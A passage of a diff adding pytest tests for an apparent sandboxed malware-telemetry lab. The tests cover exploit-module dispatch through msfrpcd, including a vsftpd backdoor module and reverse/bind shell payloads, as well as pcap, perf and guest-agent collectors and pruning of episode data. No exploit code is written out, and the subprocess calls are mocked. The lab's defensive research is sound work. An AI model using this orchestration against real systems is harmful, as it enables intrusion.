+        'name = "x"\n'
+        'family = "y"\n'
+        'category = "fish"\n'
+        'profile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="category"):
+        SampleManifest.load(p)
+
+
+def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
+    p = tmp_path / "dup.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+        '\n[[sample]]\n'
+        'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+    )
+    with pytest.raises(ValueError, match="duplicate"):
+        SampleManifest.load(p)
+
+
+# ---------------------------------------------------------------------------
+# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
+# ---------------------------------------------------------------------------
+
+
+class _RecordingPopen:
+    """Replacement for subprocess.run that just records what it would
+    have invoked. Returns a returncode-0 result."""
+    calls: list[dict] = []
+
+    def __init__(self, args, **kwargs) -> None:
+        # Mimic CompletedProcess shape.
+        type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
+        self.returncode = 0
+        self.stdout = b""
+        self.stderr = b""
+
+
+def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
+    from exploits.modules import load_module_configs
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+
+    repo_root = REPO_ROOT
+    return fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=repo_root,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
+        modules=load_module_configs(repo_root / "exploits" / "modules"),
+        force_tier2=force_tier2,
+    )
+
+
+def _patch_subprocess(monkeypatch):
+    from orchestrator import fleet
+    _RecordingPopen.calls = []
+    monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
+
+
+def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier3", res
+    assert res.module_name in cfg.modules
+    cmd = _RecordingPopen.calls[-1]["args"]
+    # The Tier-3 runner is what gets invoked.
+    assert any("run_tier3_demo.py" in str(a) for a in cmd)
+    # The module name is plumbed through.
+    assert "--module" in cmd
+    assert res.module_name in cmd
+
+
+def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier2"
+    assert res.module_name is None
+    cmd = _RecordingPopen.calls[-1]["args"]
+    assert any("run_real_vm_demo.py" in str(a) for a in cmd)
+
+
+def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+    cfg = fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=REPO_ROOT,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
+        modules={},  # explicitly empty
+    )
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
+    """Fleet must filter out callback-payload modules when BRIDGE is
+    unset — otherwise the exploit fires but the session never lands
+    and the episode degenerates to a 30 s session_open_timeout."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.delenv("BRIDGE", raising=False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    seen_modules = set()
+    for ep in range(20):
+        res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
+        if res.tier == "tier3" and res.module_name:
+            seen_modules.add(res.module_name)
+
+    # Every selected module must be callback-free (same-socket).
+    callback_modules = {
+        m.name for m in cfg.modules.values() if m.requires_bridge
+    }
+    assert callback_modules, "test setup error: expected some requires_bridge modules"
+    assert not (seen_modules & callback_modules), \
+        f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
+
+
+def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
+    """With BRIDGE set, the full catalog (including reverse/bind shell
+    payloads) is in rotation."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.setenv("BRIDGE", "br-malware")
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    seen = set()
+    for ep in range(40):
+        res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
+        if res.tier == "tier3" and res.module_name:
+            seen.add(res.module_name)
+    assert seen == set(cfg.modules.keys()), \
+        f"only saw {seen}/{set(cfg.modules.keys())}"
+
+
+def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
+    """When BRIDGE is set in the parent env, the per-slot subprocess
+    env must carry it through so launch_target.sh enters tap+bridge mode."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    monkeypatch.setenv("BRIDGE", "br-malware")
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
+
+
+def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
+    """Concurrent Tier-3 slots can't share the host-side hostfwd port
+    or all targets stomp on each other's vsftpd:21 → 21 mapping. The
+    fleet must shift PORT_BASE per slot."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
+
+    port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
+    assert len(set(port_bases)) == len(port_bases), \
+        f"PORT_BASE collision across slots: {port_bases}"
+
+
+def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
+    p = tmp_path / "real.toml"
+    p.write_text(
+        '[[sample]]\n'
+        'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+        'sha256 = "abc123"\n'
+        '\n[[sample]]\n'
+        'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
+    )
+    m = SampleManifest.load(p)
+    by_name = {s.name: s for s in m.samples}
+    assert by_name["real-one"].kind == "real"
+    assert by_name["mimic-one"].kind == "mimic"
--- a/tests/test_guest_agent.py
+++ b/tests/test_guest_agent.py
@ -0,0 +1,152 @@
+"""Tests for the host-side guest-agent collector.
+
+We simulate the in-guest agent by spinning up a unix socket server
+(stand-in for the QEMU virtio-serial chardev) that writes a few
+JSON-lines rows. The collector should read them, re-stamp with the
+host's monotonic clock, and persist to telemetry-guest.jsonl.
+"""
+
+from __future__ import annotations
+
+import json
+import socket
+import threading
+import time
+from pathlib import Path
+
+import pytest
+
+from collectors import guest_agent
+
+
+class FakeAgentServer(threading.Thread):
+    def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
+        super().__init__(daemon=True)
+        self.sock_path = sock_path
+        self.rows = rows
+        self.delay_s = delay_s
+        self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+        self._sock.bind(str(sock_path))
+        self._sock.listen(1)
+        self._sock.settimeout(5.0)
+
+    def run(self) -> None:
+        try:
+            conn, _ = self._sock.accept()
+        except socket.timeout:
+            return
+        try:
+            for row in self.rows:
+                conn.sendall((json.dumps(row) + "\n").encode())
+                time.sleep(self.delay_s)
+            time.sleep(0.1)
+        finally:
+            conn.close()
+            self._sock.close()
+
+
+def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
+    sock_path = tmp_path / "agent.sock"
+    rows_in = [
+        {
+            "t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
+            "source": "guest_agent", "available_in_deployment": True,
+            "mem_total_bytes": 256 * 1024 * 1024,
+            "mem_available_bytes": 200 * 1024 * 1024,
+            "load_1m_5m_15m": [0.1, 0.05, 0.0],
+            "cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
+        },
+        {
+            "t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
+            "source": "guest_agent", "available_in_deployment": True,
+            "mem_total_bytes": 256 * 1024 * 1024,
+            "mem_available_bytes": 198 * 1024 * 1024,
+        },
+    ]
+    server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
+    server.start()
+    out_path = tmp_path / "telemetry-guest.jsonl"
+    stop = threading.Event()
+
+    def stop_after(ms: int) -> None:
+        time.sleep(ms / 1000.0)
+        stop.set()
+
+    threading.Thread(target=stop_after, args=(300,), daemon=True).start()
+
+    rows_written = guest_agent.run_loop(
+        socket_path=sock_path,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=stop,
+        connect_timeout_s=2.0,
+    )
+    server.join(timeout=2)
+
+    assert rows_written == 2
+    persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
+    assert len(persisted) == 2
+    for orig, got in zip(rows_in, persisted):
+        # Original guest timestamps preserved.
+        assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
+        # Host-clock fields added.
+        assert "t_mono_ns" in got
+        assert "t_wall_ns" in got
+        assert got["source"] == "guest_agent"
+        assert got["available_in_deployment"] is True
+
+
+def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
+    rows = guest_agent.run_loop(
+        socket_path=tmp_path / "no-socket-here.sock",
+        output_path=tmp_path / "out.jsonl",
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=threading.Event(),
+        connect_timeout_s=0.5,
+    )
+    assert rows == 0
+
+
+def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
+    sock_path = tmp_path / "agent.sock"
+    # Will be sent verbatim; the malformed line should be skipped.
+    payload = (
+        b'{"source":"guest_agent","mem_total_bytes":1}\n'
+        b'this-is-not-json\n'
+        b'{"source":"guest_agent","mem_total_bytes":2}\n'
+    )
+
+    class Server(threading.Thread):
+        def __init__(self) -> None:
+            super().__init__(daemon=True)
+            self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+            self._sock.bind(str(sock_path))
+            self._sock.listen(1)
+
+        def run(self) -> None:
+            conn, _ = self._sock.accept()
+            try:
+                conn.sendall(payload)
+                time.sleep(0.2)
+            finally:
+                conn.close()
+                self._sock.close()
+
+    s = Server()
+    s.start()
+    out_path = tmp_path / "out.jsonl"
+    stop = threading.Event()
+    threading.Thread(
+        target=lambda: (time.sleep(0.4), stop.set()), daemon=True
+    ).start()
+    rows = guest_agent.run_loop(
+        socket_path=sock_path,
+        output_path=out_path,
+        t_mono_origin_ns=time.monotonic_ns(),
+        stop_event=stop,
+        connect_timeout_s=2.0,
+    )
+    s.join(timeout=2)
+    assert rows == 2
+    persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
+    assert [r["mem_total_bytes"] for r in persisted] == [1, 2]
--- a/tests/test_pcap.py
+++ b/tests/test_pcap.py
@@ -0,0 +1,188 @@
+"""Tests for the pcap collector's pure-Python parser + bucketizer.
+
+We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
+records with controlled timestamps), feed it to ``bucketize()``, and
+verify the produced netflow.jsonl rows are correct.
+"""
+
+from __future__ import annotations
+
+import json
+import struct
+from pathlib import Path
+
+import pytest
+
+from collectors import pcap
+
+
+# ---------------------------------------------------------------------------
+# pcap synthesis helpers
+# ---------------------------------------------------------------------------
+
+
+_PCAP_GLOBAL_HDR = struct.pack(
+    "<IHHiIII",
+    0xa1b2c3d4,  # magic (us)
+    2, 4,        # version
+    0,           # thiszone
+    0,           # sigfigs
+    65535,       # snaplen
+    1,           # linktype = LINKTYPE_ETHERNET
+)
+
+
+def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
+    s = bytes(int(x) for x in src.split("."))
+    d = bytes(int(x) for x in dst.split("."))
+    total_len = 20 + len(payload)
+    return struct.pack(
+        ">BBHHHBBH",      # network byte order, 12 bytes before the addresses
+        0x45,             # version=4, IHL=5
+        0,                # tos
+        total_len,
+        0, 0, 64, proto,
+        0,                # checksum (don't care)
+    ) + s + d + payload
+
+
+def _tcp(sport: int, dport: int, flags: int) -> bytes:
+    # Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
+    return struct.pack(">HHIIBBHHH",
+                       sport, dport,
+                       0, 0,
+                       0x50,           # data offset = 5 (no options)
+                       flags,
+                       0, 0, 0)
+
+
+def _udp(sport: int, dport: int, length: int = 8) -> bytes:
+    return struct.pack(">HHHH", sport, dport, length, 0)
+
+
+def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
+    return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
+
+
+def _record(ts_ns: int, frame: bytes) -> bytes:
+    sec = ts_ns // 1_000_000_000
+    usec = (ts_ns // 1000) % 1_000_000
+    return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
+
+
+def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
+    out = bytearray(_PCAP_GLOBAL_HDR)
+    for ts, frame in records:
+        out += _record(ts, frame)
+    return bytes(out)
+
+
+def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
+    path.write_bytes(_build_pcap(records))
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
+    p = tmp_path / "a.pcap"
+    frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
+    _write_pcap(p, [(1_000_000_000, frame)])
+
+    records = list(pcap._iter_pcap(p))
+    assert len(records) == 1
+    t_ns, data = records[0]
+    assert t_ns == 1_000_000_000
+    assert data == frame
+
+
+def test_decode_tcp_syn() -> None:
+    f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
+    d = pcap._decode(f)
+    assert d["ethertype"] == 0x0800
+    assert d["ip_proto"] == 6
+    assert d["src_ip"] == "10.200.0.1"
+    assert d["dst_ip"] == "10.200.0.10"
+    assert d["src_port"] == 40000
+    assert d["dst_port"] == 21
+    assert d["tcp_flags"] & 0x02
+
+
+def test_decode_udp_dns_query() -> None:
+    f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
+    d = pcap._decode(f)
+    assert d["ip_proto"] == 17
+    assert d["dst_port"] == 53
+
+
+def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
+    pcap_path = tmp_path / "ep.pcap"
+    netflow_path = tmp_path / "netflow.jsonl"
+
+    bridge_ip = "10.200.0.1"
+    guest_ip = "10.200.0.10"
+    base_ns = 1_700_000_000_000_000_000  # arbitrary; a whole multiple of the 100 ms bucket
+
+    records = [
+        # Bucket A (0..100ms)
+        (base_ns + 5_000_000,
+         _ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
+        (base_ns + 9_000_000,
+         _ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
+        # Bucket B (100..200ms): UDP DNS query
+        (base_ns + 105_000_000,
+         _ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
+        # Bucket B: TCP RST
+        (base_ns + 199_000_000,
+         _ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
+    ]
+    _write_pcap(pcap_path, records)
+
+    rows_written = pcap.bucketize(
+        pcap_path, netflow_path,
+        bucket_ms=100,
+        t_mono_origin_ns=base_ns,
+        bridge_ip=bridge_ip,
+    )
+    assert rows_written == 2
+
+    rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
+    a, b = rows
+    assert a["bucket_ms"] == 100
+    # Bucket A: 1 in (SYN), 1 out (SYN-ACK)
+    assert a["pkts_in"] == 1
+    assert a["pkts_out"] == 1
+    assert a["syn_count"] == 2
+    assert a["tcp_new_flows"] == 1  # only the bare SYN counts as new flow
+    assert a["dns_query_count"] == 0
+    assert a["unique_dst_ips"] == 2
+
+    # Bucket B: DNS + RST
+    assert b["dns_query_count"] == 1
+    assert b["rst_count"] == 1
+
+
+def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
+    rows = pcap.bucketize(
+        tmp_path / "nope.pcap",
+        tmp_path / "netflow.jsonl",
+        bucket_ms=100,
+        t_mono_origin_ns=0,
+    )
+    assert rows == 0
+
+
+def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
+    p = tmp_path / "x.pcap"
+    netflow = tmp_path / "n.jsonl"
+    # ARP frame (ethertype 0x0806) — counted but not decoded.
+    f = _ether(b"\x00" * 28, ethertype=0x0806)
+    _write_pcap(p, [(1_000_000_000, f)])
+    rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
+    assert rows == 1
+    out = json.loads(netflow.read_text().splitlines()[0])
+    # No IP info, but byte/packet count survives.
+    assert out["pkts_in"] + out["pkts_out"] == 1
+    assert out["tcp_count"] == 0
--- a/tests/test_perf_qemu.py
+++ b/tests/test_perf_qemu.py
@@ -0,0 +1,82 @@
+"""Tests for the perf-stat collector — parser logic in isolation
+(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
+hardware counters that the test runner can't assume)."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from collectors import perf_qemu
+
+
+def test_parse_event_line_extracts_fields() -> None:
+    line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
+    evt = perf_qemu.parse_perf_event_line(line)
+    assert evt is not None
+    assert evt["event"] == "cycles"
+    assert evt["interval"] == 0.100123
+    assert evt["counter-value"] == "1234567"
+
+
+def test_parse_event_line_skips_non_json() -> None:
+    assert perf_qemu.parse_perf_event_line("") is None
+    assert perf_qemu.parse_perf_event_line("garbage") is None
+    assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
+
+
+def test_coerce_int_handles_perf_quirks() -> None:
+    assert perf_qemu._coerce_int("1234567") == 1234567
+    assert perf_qemu._coerce_int("1,234,567") == 1234567
+    assert perf_qemu._coerce_int("<not counted>") is None
+    assert perf_qemu._coerce_int("<not supported>") is None
+    assert perf_qemu._coerce_int("") is None
+    assert perf_qemu._coerce_int(None) is None
+    assert perf_qemu._coerce_int(42) == 42
+
+
+def test_build_row_computes_ipc_and_miss_rate() -> None:
+    agg = {
+        "cycles": 1_000_000_000,
+        "instructions": 660_000_000,
+        "cache-references": 1_000_000,
+        "cache-misses": 50_000,
+        "branches": 100_000_000,
+        "branch-misses": 5_000_000,
+        "page-faults": 12,
+        "context-switches": 20,
+    }
+    row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
+    assert row["source"] == "host_perf"
+    assert row["available_in_deployment"] is False
+    assert row["cycles"] == 1_000_000_000
+    assert row["instructions"] == 660_000_000
+    assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
+    assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
+    assert row["interval_s"] == 0.1
+
+
+def test_build_row_handles_missing_counters() -> None:
+    """If perf can't enable cache-misses on this hardware, the row
+    should still be valid — just with None for the missing fields."""
+    agg = {"cycles": 100, "instructions": 50}
+    row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
+    assert row["cycles"] == 100
+    assert row["cache_misses"] is None
+    assert row["cache_miss_rate"] is None
+    assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
+
+
+def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
+    monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
+    import threading
+    rows = perf_qemu.run_loop(
+        pid=1,
+        output_path=tmp_path / "telemetry-perf.jsonl",
+        t_mono_origin_ns=0,
+        interval_ms=100,
+        stop_event=threading.Event(),
+    )
+    assert rows == 0
--- a/tests/test_prune.py
+++ b/tests/test_prune.py
@@ -0,0 +1,309 @@
+"""Tests for cis490-prune. Builds synthetic episode tarballs (each
+flagged with a specific quality issue) and confirms the classifier
+catches them. Then exercises the index-walk + dry-run / archive /
+delete actions on a temp tree so we don't touch real data."""
+
+from __future__ import annotations
+
+import io
+import json
+import shutil
+import subprocess
+import tarfile
+from pathlib import Path
+
+import pytest
+
+
+# Skip the whole module if zstd isn't on PATH (the prune tool shells
+# out for decompression, mirroring the shipper).
+zstd_available = shutil.which("zstd") is not None
+pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
+
+
+import sys
+ROOT = Path(__file__).resolve().parent.parent
+sys.path.insert(0, str(ROOT / "tools"))
+import prune_episodes as pe  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# tar+zstd builder
+# ---------------------------------------------------------------------------
+
+
+def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
+    """Build a {episode_id}/<file> layout, tar it, zstd it."""
+    raw_tar = io.BytesIO()
+    with tarfile.open(fileobj=raw_tar, mode="w") as t:
+        for name, data in files.items():
+            info = tarfile.TarInfo(name=name)
+            info.size = len(data)
+            t.addfile(info, io.BytesIO(data))
+    out_path.parent.mkdir(parents=True, exist_ok=True)
+    raw_tmp = out_path.with_suffix(".tar")
+    raw_tmp.write_bytes(raw_tar.getvalue())
+    try:
+        with out_path.open("wb") as fh:
+            subprocess.check_call(
+                ["zstd", "-q", "-19", "--stdout", str(raw_tmp)], stdout=fh
+            )
+    finally:
+        raw_tmp.unlink(missing_ok=True)
+
+
+def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
+    return json.dumps({
+        "episode_id": "01TEST",
+        "schema_version": 1,
+        "sample": sample,
+        "exploit": exploit,
+        "result": {"phases_observed": ["clean", "infected_running", "dormant"]},
+    }, sort_keys=True).encode()
+
+
+def _events(rows: list[dict]) -> bytes:
+    return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
+
+
+def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
+    """Synthesize /proc rows with either flat-CPU (no phase signal)
+    or sharply spiking CPU (clear phase boundaries). The labels file
+    built by the tests pairs with these rows."""
+    out: list[dict] = []
+    for i in range(n):
+        t = i * 100_000_000
+        if flat:
+            jiff = 100 + i * 20  # uniform increment → flat CPU%
+        else:
+            # First third clean (low), middle infected (high), last third dormant (low).
+            jiff = (
+                100 + i * 20 if i < n // 3 or i >= 2 * n // 3
+                else 100 + i * 1000  # huge jump for "infected"
+            )
+        out.append({
+            "t_mono_ns": t,
+            "cpu_user_jiffies": jiff,
+            "cpu_sys_jiffies": 0,
+            "rss_bytes": 1024 * 1024,
+        })
+    return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
+
+
+def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
+    rows = [
+        {"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
+        for i, (t, p) in enumerate(zip(boundary_ns, names))
+    ]
+    return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
+
+
+# ---------------------------------------------------------------------------
+# Per-reason classifier tests
+# ---------------------------------------------------------------------------
+
+
+def _make_episode(tmp_path: Path, **member_overrides) -> Path:
+    """Default = a healthy episode with sample, exploit, workload events,
+    sharp CPU envelope. Overrides replace specific members."""
+    n = 60
+    end_ns = n * 100_000_000
+    members = {
+        "01TEST/meta.json": _meta(
+            sample={"name": "xmrig", "kind": "real", "family": "XMRig",
+                    "category": "cryptominer", "profile": "cpu-saturate",
+                    "sha256": "a" * 64},
+            exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
+        ),
+        "01TEST/events.jsonl": _events([
+            {"event": "snapshot_load"},
+            {"event": "workload_setup"},
+            {"event": "workload_started", "phase": "infected_running"},
+            {"event": "workload_killed", "phase": "dormant",
+             "pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
+            {"event": "episode_end"},
+        ]),
+        "01TEST/labels.jsonl": _labels(
+            [0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
+            ["clean", "infected_running", "dormant"],
+        ),
+        "01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
+    }
+    members.update(member_overrides)
+    out = tmp_path / "01TEST.tar.zst"
+    _make_tar_zst(out, members)
+    return out
+
+
+def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
+    tar = _make_episode(tmp_path)
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert q.reasons == [], f"unexpected reasons: {q.reasons}"
+    assert q.sample_name == "xmrig"
+    assert q.module_name == "vsftpd_234_backdoor"
+
+
+def test_no_sample_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/meta.json": _meta(sample=None, exploit=None)},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "no-sample" in q.reasons
+
+
+def test_no_workload_events_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "snapshot_load"},
+            {"event": "phase_transition", "to": "clean"},
+            {"event": "episode_end"},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "no-workload-events" in q.reasons
+
+
+def test_workload_failed_flag(tmp_path: Path) -> None:
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "workload_setup"},
+            {"event": "workload_failed", "phase": "infected_running",
+             "error": "EOF on serial"},
+            {"event": "episode_end"},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "workload-failed" in q.reasons
+
+
+def test_workload_silent_flag(tmp_path: Path) -> None:
+    """The elliott-lab fingerprint: dormant probe shows yes=0,
+    meaning the workload never actually fired."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/events.jsonl": _events([
+            {"event": "workload_setup"},
+            {"event": "workload_started", "phase": "infected_running"},
+            {"event": "workload_killed", "phase": "dormant",
+             "pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
+        ])},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "workload-silent" in q.reasons
+
+
+def test_flat_cpu_flag(tmp_path: Path) -> None:
+    """When the proc CPU% spread between phases is < 5pp, the episode
+    has no signal for the trainer to learn from."""
+    tar = _make_episode(
+        tmp_path,
+        **{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
+    )
+    q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
+    assert "flat-cpu" in q.reasons
+
+
+# ---------------------------------------------------------------------------
+# Walk + actions
+# ---------------------------------------------------------------------------
+
+
+def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
+    """Build a fake /var/lib/cis490 layout with two episodes: one
+    healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
+    episodes = tmp_path / "episodes"
+    (episodes / "lab1").mkdir(parents=True)
+    healthy = _make_episode(episodes / "lab1" / "01OK")
+    healthy.rename(episodes / "lab1" / "01OK.tar.zst")
+    bad = _make_episode(
+        episodes / "lab1" / "01FAKE",
+        **{"01TEST/meta.json": _meta(sample=None)},
+    )
+    bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
+    index = tmp_path / "index.jsonl"
+    rows = [
+        {"host_id": "lab1", "episode_id": "01OK"},
+        {"host_id": "lab1", "episode_id": "01FAKE"},
+    ]
+    index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
+    return episodes, index
+
+
+def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
